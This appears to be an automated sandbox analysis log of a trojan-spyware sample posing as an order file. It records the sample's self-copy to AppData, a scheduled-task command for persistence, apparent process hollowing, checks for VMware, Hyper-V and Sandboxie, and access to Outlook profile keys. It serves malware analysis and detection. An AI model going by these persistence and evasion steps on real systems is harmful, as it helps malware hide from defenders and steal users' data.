Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07994A80 0_2_07994A80
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07993AB9 0_2_07993AB9
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0799A2B7 0_2_0799A2B7
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07993AC8 0_2_07993AC8
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0799A2C8 0_2_0799A2C8
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07993250 0_2_07993250
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07993242 0_2_07993242
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07994A69 0_2_07994A69
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_079909F8 0_2_079909F8
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_079938B0 0_2_079938B0
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_079938C0 0_2_079938C0
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07990006 0_2_07990006
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0799003A 0_2_0799003A
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07999050 0_2_07999050
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07999043 0_2_07999043
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0F2E0DD3 0_2_0F2E0DD3
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_0120F5D8 4_2_0120F5D8
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_01206680 4_2_01206680
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_0120F920 4_2_0120F920
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CAD0B8 4_2_06CAD0B8
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CADA04 4_2_06CADA04
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CAA0FC 4_2_06CAA0FC
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Code function: 5_2_02C0E880 5_2_02C0E880
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Code function: 5_2_02C0E870 5_2_02C0E870
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Code function: 5_2_02C0BFF4 5_2_02C0BFF4
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.353975152.0000000008FF0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMajorRevision.exe< vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.338224910.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCassa.dll< vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.338224910.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameee5480e3-6672-4c3d-b2bc-dbb41213b835.exe4 vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000000.294120479.0000000000BF8000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameRycGBA2.exe< vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.344873372.00000000041F6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMajorRevision.exe< vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.344873372.00000000041F6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRycGBA2.exe< vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.343033622.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameee5480e3-6672-4c3d-b2bc-dbb41213b835.exe4 vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.339949264.0000000003165000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMajorRevision.exe< vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.561914622.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000000.334273963.000000000042A000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameee5480e3-6672-4c3d-b2bc-dbb41213b835.exe4 vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe Binary or memory string: OriginalFilenameRycGBA2.exe< vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: WsdnBq.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ORDER (6256 OS)#391 PI.exe ReversingLabs: Detection: 30%
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe File read: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmpF47D.tmp
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process created: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe {path}
Source: unknown Process created: C:\Users\user\AppData\Roaming\WsdnBq.exe C:\Users\user\AppData\Roaming\WsdnBq.exe
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmp645E.tmp
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process created: C:\Users\user\AppData\Roaming\WsdnBq.exe {path}
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe File created: C:\Users\user\AppData\Roaming\WsdnBq.exe
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe File created: C:\Users\user\AppData\Local\Temp\tmpF47D.tmp
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@14/5@6/4
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe File read: C:\Users\user\Desktop\desktop.ini
Source: ORDER (6256 OS)#391 PI.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2236:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1496:120:WilError_01
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Mutant created: \Sessions\1\BaseNamedObjects\pwiUZWOdBetP
Source: 4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpack, A/e2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: ORDER (6256 OS)#391 PI.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: ORDER (6256 OS)#391 PI.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: ORDER (6256 OS)#391 PI.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: RycGBA2.pdb source: ORDER (6256 OS)#391 PI.exe, WsdnBq.exe.0.dr
Source: Binary string: RycGBA2.pdbSHA256 source: ORDER (6256 OS)#391 PI.exe, WsdnBq.exe.0.dr
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0798F663 push ecx; iretd 0_2_0798F66D
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07996226 push ss; iretd 0_2_07996227
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA14C8 push eax; iretd 4_2_06CA15D9
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA0EBD push es; retf 4_2_06CA0EC0
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CAAD5E push es; ret 4_2_06CAAD60
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA092D push 8B000005h; retf 4_2_06CA0937
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA144F push es; ret 4_2_06CA1480
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA1441 push cs; retf 0006h 4_2_06CA1442
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA141D push cs; retf 0006h 4_2_06CA141E
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA1413 push es; iretd 4_2_06CA1414
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA1429 push cs; retf 0006h 4_2_06CA142A
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA142D push cs; retf 0006h 4_2_06CA142E
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA1421 push cs; retf 0006h 4_2_06CA1422
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA1425 push cs; retf 0006h 4_2_06CA1426
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA1439 push cs; retf 0006h 4_2_06CA143A
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA143D push cs; retf 0006h 4_2_06CA143E
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA1431 push cs; retf 0006h 4_2_06CA1432
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA1435 push cs; retf 0006h 4_2_06CA1436
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA123F push es; retf 4_2_06CA1240
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Code function: 5_2_0E820FED push FFFFFF8Bh; iretd 5_2_0E820FEF
Source: initial sample Static PE information: section name: .text entropy: 7.6706447927786225
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe File created: C:\Users\user\AppData\Roaming\WsdnBq.exe

Boot Survival

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmpF47D.tmp
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1688, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: WsdnBq.exe PID: 6004, type: MEMORYSTR
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.338224910.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.338224910.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe TID: 6024 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe TID: 4864 Thread sleep count: 8986 > 30
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe TID: 5116 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe TID: 5064 Thread sleep count: 8770 > 30
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Window / User API: threadDelayed 8986
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Window / User API: threadDelayed 8770
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information queried: ProcessInformation
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.333366002.0000000008D9A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE
Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: WsdnBq.exe, 00000008.00000003.450250389.00000000015E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Memory written: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmpF47D.tmp Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process created: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe {path} Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmp645E.tmp
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process created: C:\Users\user\AppData\Roaming\WsdnBq.exe {path}
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
